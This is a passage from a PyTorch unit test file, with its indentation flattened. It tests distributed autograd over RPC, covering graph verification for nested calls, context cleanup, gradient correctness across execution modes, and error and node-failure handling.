# Second one is for prev context id when this rank make 1st nested
# call.
# Third one is for prev prev context id when this rank make
# 2nd nested call.
# Last one is for prev prev prev context id when this rank
# execute the torch.add() operator.
# Verify first graph for current context id.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(1, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[0],
t1,
t2,
ret,
)
# Verify second graph for 1st nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# Verify third graph for 2nd nested call.
ctx = dist_autograd._retrieve_context(ctx_ids[2])
self._verify_graph_for_nested_rpc_call(ctx)
# verify last graph for rpc call execution.
ctx = dist_autograd._retrieve_context(ctx_ids[3])
send_functions = ctx._send_functions()
self.assertEqual(1, len(send_functions))
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[0])
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call(self):
self._test_graph_for_py_nested_call(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call(self):
self._test_graph_for_py_nested_call(ExecMode.REMOTE)
# Rank0->Rank1->Rank0
def _test_graph_for_py_nested_call_itself(self, exec_mode):
dst_rank = (self.rank + 1) % self.world_size
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank),
my_py_nested_call,
args=(
t1,
t2,
(self.rank - 1 + self.world_size) % self.world_size,
self.world_size,
0,
),
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name((self.rank + 1) % self.world_size),
_set_rpc_done,
args=(context_id, 1),
)
# For self.rank, it has 2 graphs to verify.
# One is for current context id when this rank send first rpc
# call and execute the torch.add() operator.
# Another one is for prev context id when this rank make
# nested call.
ctx = dist_autograd._current_context()
self.assertEqual(context_id, ctx._context_id())
send_functions = ctx._send_functions()
self.assertEqual(2, len(send_functions))
recv_functions = ctx._recv_functions()
self.assertEqual(2, len(recv_functions))
self._verify_graph_for_first_rpc_call(
list(send_functions.values())[0],
list(recv_functions.values())[1],
t1,
t2,
ret,
)
self._verify_graph_for_rpc_call_exec(list(send_functions.values())[1])
# Verify two pairs of send and recv functions for nested
# call
self._check_rpc_done(1)
ctx = dist_autograd._retrieve_context(ctx_ids[1])
self._verify_graph_for_nested_rpc_call(ctx)
# this barrier is needed so one worker does not clean up their
# autograd context before another worker tries to access it.
dist.barrier()
@dist_init
def test_graph_for_py_nested_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.RPC_SYNC)
@dist_init
def test_graph_for_py_nested_remote_call_itself(self):
self._test_graph_for_py_nested_call_itself(ExecMode.REMOTE)
def _test_no_graph_with_tensors_not_require_grad(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.add, args=(t1, t2)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
ctx = dist_autograd._current_context()
send_functions = ctx._send_functions()
self.assertEqual(len(send_functions), 0)
recv_functions = ctx._recv_functions()
self.assertEqual(len(recv_functions), 0)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
# NB: RRef.to_here() always passes the autograd context to the
# callee, as the caller does not know whether the return value
# would contain a requires_grad tensor or not.
#
# rpc/remote with udf (_set_rpc_done here) also always passes the
# autograd context to the callee due to the same reason.
self.assertNotEqual(-1, dist_autograd._retrieve_context(ctx_ids[1]))
dist.barrier()
@dist_init
def test_no_graph_with_tensors_not_require_grad(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.RPC_SYNC)
@dist_init
def test_no_graph_with_tensors_not_require_grad_remote(self):
self._test_no_graph_with_tensors_not_require_grad(ExecMode.REMOTE)
def _test_grad_only_on_return_value(self, exec_mode):
initialize_pg(self.file_init_method, self.rank, self.world_size)
dst_rank = (self.rank + 1) % self.world_size
with dist_autograd.context() as context_id:
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(worker_name(dst_rank), ret_requires_grad)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), ret_requires_grad
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
dist_autograd.backward(context_id, [ret.sum()])
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# Wait for the prev rank to be done with rpc.
self._check_rpc_done(1)
grads = dist_autograd.get_gradients(ctx_ids[1])
self.assertEqual(1, len(grads))
self.assertIn(requires_grad_tensor, grads)
self.assertEqual(torch.ones_like(ret), grads[requires_grad_tensor])
# due to the above get_gradients call, ensure that dist autograd
# contexts aren't cleaned up until all workers exit context managers
dist.barrier()
@dist_init
def test_grad_only_on_return_value(self):
self._test_grad_only_on_return_value(ExecMode.RPC_SYNC)
@dist_init
def test_grad_only_on_return_value_remote(self):
self._test_grad_only_on_return_value(ExecMode.REMOTE)
def _test_rpc_complex_args(self, exec_mode):
with dist_autograd.context() as context_id:
num_tensors = 10
tensors = []
for i in range(num_tensors):
tensors.append(torch.ones(3, 3, requires_grad=(i % 2 == 0)))
dst_rank = self._next_rank()
if ExecMode.RPC_SYNC == exec_mode:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.stack, args=(tensors,)
)
elif ExecMode.REMOTE == exec_mode:
ret = rpc.remote(
worker_name(dst_rank), torch.stack, args=(tensors,)
).to_here()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
self.assertEqual(torch.stack(tensors), ret)
# Verify that the appropriate tensors have been attached to the autograd graph.
next_funcs = list(
dist_autograd._current_context()._send_functions().values()
)[0].next_functions
idx = 0
for i in range(len(next_funcs)):
self.assertEqual(
"torch::autograd::AccumulateGrad", next_funcs[i][0].name()
)
# Only every other tensor requires grad, so only those are attached.
self.assertEqual(tensors[i * 2], next_funcs[i][0].variable)
# Verify that the worker id has been recorded in the context
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(len(worker_ids), 1)
self.assertEqual(worker_ids, {dst_rank})
@dist_init
def test_rpc_complex_args(self):
self._test_rpc_complex_args(ExecMode.RPC_SYNC)
@dist_init
def test_remote_complex_args(self):
self._test_rpc_complex_args(ExecMode.REMOTE)
def context_cleanup_test_helper(self, rpc_args, func, nested=False):
initialize_pg(self.file_init_method, self.rank, self.world_size)
# test that in dist autograd, in the case that tensors communicated over RPC do
# NOT require grad, we still clean up the dist autograd contexts created
# on other nodes. This is because the autograd context is still
# communicated over RPC even if tensor arguments do not require grad, as
# it is possible that the response could require grad.
if nested:
dst_rank = (self.rank + 1) % self.world_size
nested_dst_rank = (dst_rank + 1) % self.world_size
dst_ranks = {dst_rank}
else:
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), func, args=rpc_args)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
if nested:
rpc.rpc_sync(
worker_name(nested_dst_rank),
_set_rpc_done,
args=(context_id, 2),
)
# the thread's context id should be cleaned up
with self.assertRaises(RuntimeError):
dist_autograd._retrieve_context(context_id)
# Ensure all peers have finished mutating the
# `known_context_ids` set.
dist.barrier()
# check that all contexts have been cleaned up.
success = _all_contexts_cleaned_up()
self.assertTrue(success)
@dist_init
def test_context_cleanup_tensor_with_grad(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
self.context_cleanup_test_helper(rpc_args=(t1, t2), func=torch.add)
@dist_init
def test_context_cleanup_tensor_no_grad(self):
t1 = torch.ones(3, 3, requires_grad=False)
self.context_cleanup_test_helper(rpc_args=(t1, t1), func=torch.add)
@dist_init
def test_context_cleanup_no_tensors(self):
self.context_cleanup_test_helper(rpc_args=(1, 1), func=my_scalar_add)
@dist_init
def test_context_cleanup_nested_rpc(self):
t1 = torch.ones(3, 3, requires_grad=True)
t2 = torch.zeros(3, 3, requires_grad=True)
dst_rank = (self.rank + 1) % self.world_size
args = (t1, t2, dst_rank, self.world_size, 0)
self.context_cleanup_test_helper(
rpc_args=args, func=my_py_nested_call, nested=True
)
@dist_init
def test_worker_ids_recorded(self):
dst_ranks = {rank for rank in range(self.world_size) if rank != self.rank}
with dist_autograd.context() as context_id:
# if no tensors require grad, we should still record worker_ids, as
# the autograd context ID is still passed to other workers.
t1 = torch.ones(3, 3, requires_grad=False)
t2 = torch.zeros(3, 3, requires_grad=False)
for dst_rank in dst_ranks:
rpc.rpc_sync(worker_name(dst_rank), torch.add, args=(t1, t2))
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
ctx = dist_autograd._current_context()
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
# worker_ids should be recorded when tensors do require grad
t1.requires_grad = True
t2.requires_grad = True
for dst_rank in dst_ranks:
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(t1, t2)
)
rpc.rpc_sync(
worker_name(dst_rank), _set_rpc_done, args=(context_id, 1)
)
# all worker_ids in dst_ranks should be recorded.
worker_ids = ctx._known_worker_ids()
self.assertEqual(worker_ids, dst_ranks)
@dist_init
def test_dist_autograd_profiling(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(3, 3, requires_grad=True)
loss = rpc.rpc_sync(worker_name(self._next_rank()), torch.add, args=(t1, t2)).sum()
with torch.autograd.profiler.profile() as p:
dist_autograd.backward(context_id, [loss])
function_events = p.function_events
def get_event(partial_key):
return [event for event in function_events if partial_key in event.name][0]
send_event = get_event("SendRpcBackward")
recv_event = get_event("RecvRpcBackward")
backward_event = get_event("torch::distributed::autograd::backward")
# There should be at least 1 send and 1 recv event, corresponding to the send/recv functions executed.
self.assertEqual(send_event.count, 1)
self.assertEqual(recv_event.count, 1)
# The CPU total for the backward event should be greater than send and recv, since
# applying those functions in the backward pass is a subset of the entire backward pass.
self.assertGreater(backward_event.cpu_time_total, send_event.cpu_time_total)
self.assertGreater(backward_event.cpu_time_total, recv_event.cpu_time_total)
@dist_init
def test_error_in_context(self):
with dist_autograd.context() as context_id:
t1 = torch.rand(3, 3, requires_grad=True)
t2 = torch.rand(6, 6, requires_grad=True)
with self.assertRaises(RuntimeError):
# This should throw an error since matrix sizes don't match.
rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
@dist_init
def test_backward_no_grad_on_tensor(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
self.assertIsNone(t1.grad)
self.assertIsNone(t2.grad)
# Now populate .grad with local autograd engine and
# verify dist autograd doesn't mess with it.
loss_local = torch.add(t1, t2).sum()
loss_local.backward()
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
t1_grad_before = t1.grad
t2_grad_before = t2.grad
dist_autograd.backward(context_id, [loss])
self.assertEqual(t1_grad_before, t1.grad)
self.assertEqual(t2_grad_before, t2.grad)
def _test_backward_simple(self, dst):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func_with_dst(
dst, exec_mode, torch.add, t1, t2
)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_simple(self):
self._test_backward_simple(self._next_rank())
@dist_init
def test_backward_simple_self(self):
self._test_backward_simple(self.rank)
# The current rank first creates a tensor on the rref_owner, and then passes
# the rref with another tensor to the callee to run either my_rref_add or
# my_nested_rref_add, depending on whether the callee is the rref owner.
# The grad of the local tensor lives on the current rank, and the grad of the
# rref tensor lives on the rref owner.
def _test_backward_rref(self, callee, rref_owner):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
with dist_autograd.context() as context_id:
rref_t1 = rpc.remote(
rref_owner, _torch_ones, args=((3, 3),), kwargs={"requires_grad": True}
)
if callee == rref_owner:
rref = rpc.remote(callee, my_rref_add, args=(rref_t1, t2))
else:
rref = rpc.remote(
callee, my_nested_rref_add, args=(rref_owner, rref_t1, t2)
)
ret = rref.to_here()
dist_autograd.backward(context_id, [ret.sum()])
# verify grads on caller
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t2, grads)
self.assertEqual(grads[t2], t2.grad)
# verify grads on rref owner
self.assertTrue(
rpc.rpc_sync(
rref_owner,
_compare_owner_value,
args=(context_id, rref_t1, t1.grad),
)
)
@dist_init
def test_backward_rref(self):
callee = worker_name(self._next_rank())
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_multi(self):
if self.rank > 0:
callee = "worker0"
rref_owner = callee
self._test_backward_rref(callee, rref_owner)
@dist_init
def test_backward_rref_nested(self):
callee = worker_name((self.rank + 1) % self.world_size)
rref_owner = worker_name((self.rank + 2) % self.world_size)
self._test_backward_rref(callee, rref_owner)
# In this test, every rank will serve as a parameter server (ps) and a
# driver, and then kicks off trainers on the other three ranks. So, we have:
# ps = rank0 with trainers = rank1/2/3
# ps = rank1 with trainers = rank2/3/0
# ps = rank2 with trainers = rank3/0/1
# ps = rank3 with trainers = rank0/1/2
#
# These four test ps-trainer groups run on completely separate autograd
# graphs, but they share the same set of underlying RpcAgents.
def _test_trainer_ps(self, create_ref_fn, trainer_fn):
local_grads = None
t1 = torch.ones((3, 3), requires_grad=True)
t2 = torch.zeros((3, 3), requires_grad=True)
local_ret = torch.add(t1, t2)
local_ret.sum().backward()
# create rref on self
rref_t1 = rpc.remote(
worker_name(self.rank),
create_ref_fn,
args=())
# kick off forward and backward pass on three other workers (trainers)
rank_diffs = [1, 2, 3]
futures = []
for rank_diff in rank_diffs:
futures.append(
rpc.rpc_async(
worker_name((self.rank + rank_diff) % self.world_size),
trainer_fn,
args=(rref_t1, t2, worker_name(self.rank), rank_diff),
)
)
# check that the trainers are done with their backward pass
for rank_diff in rank_diffs:
self._check_rpc_done(rank_diff)
# trainers are done and holding the context for verification
accumulate_grad_func = None
for rank_diff in rank_diffs:
# make sure grads are accumulated for the same tensors and values
# are all correct
ctx_id = ctx_ids[rank_diff]
grads = dist_autograd.get_gradients(ctx_id)
local_t1 = rref_t1.to_here()
self.assertIn(local_t1, grads)
self.assertEqual(grads[local_t1], t1.grad)
# unblock trainers
_set_rpc_done(None, 0)
# wait until all trainers are done
torch.futures.wait_all(futures)
@dist_init
def test_trainer_ps(self):
self._test_trainer_ps(create_tensor, _run_trainer)
@dist_init
def test_trainer_ps_torchscript_functions(self):
# TODO: needs more investigation.
# There is an RRef leak when shutting down; we suspect it is because the
# RRef passed as an arg crosses the pybind boundary and is not garbage
# collected by Python when calling shutdown().
import torch.distributed.rpc.api as api
api._ignore_rref_leak = True
self._test_trainer_ps(create_torchscript_tensor, _run_trainer_torchscript)
@dist_init
def test_backward_multiple_round_trips(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3))
t3 = torch.rand((3, 3), requires_grad=True)
t4 = torch.rand((3, 3))
t5 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
# Multiple RPCs between different nodes.
val = self._exec_func(exec_mode, torch.add, t1, t2)
val = self._exec_func(exec_mode, torch.mul, t3, val)
s1 = self._exec_func(exec_mode, torch.stack, (t4, val))
s2 = self._exec_func(exec_mode, torch.stack, (t5, val))
val = self._exec_func(exec_mode, torch.bmm, s1, s2)
val = self._exec_func(exec_mode, torch.matmul, val, val)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3, t4, t5
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# We don't use the result of the RPC function; as a result, the
# backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
# Run backward, this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
# Run the same code locally and with dist autograd and verify gradients
# are same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
# Mark rank 0 as done in the store, since the RPC framework on
# some nodes might be broken at this point (listenLoop() in
# ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
